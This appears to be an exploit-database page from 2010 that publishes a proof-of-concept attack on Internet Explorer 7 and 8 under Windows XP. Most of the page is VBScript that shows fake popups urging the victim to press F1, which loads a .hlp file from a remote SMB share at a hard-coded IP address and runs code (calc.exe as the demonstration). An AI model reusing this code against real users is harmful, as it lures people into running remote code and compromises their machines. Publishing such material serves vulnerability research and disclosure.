Topic : | Windows XP Internet Explorer 8,7 .HLP (calc.exe) PoC
|
ExploitAlert : 7868
Credit : Maurycy Prodeus
Date : 02.03.2010
Download
Plain text version
 Exploit Code : <html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
//For i=1 to 2500
// big = big & "\..\"
//Next
MsgBox "please press F1 to save the world", ,"please save the world", big,
1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|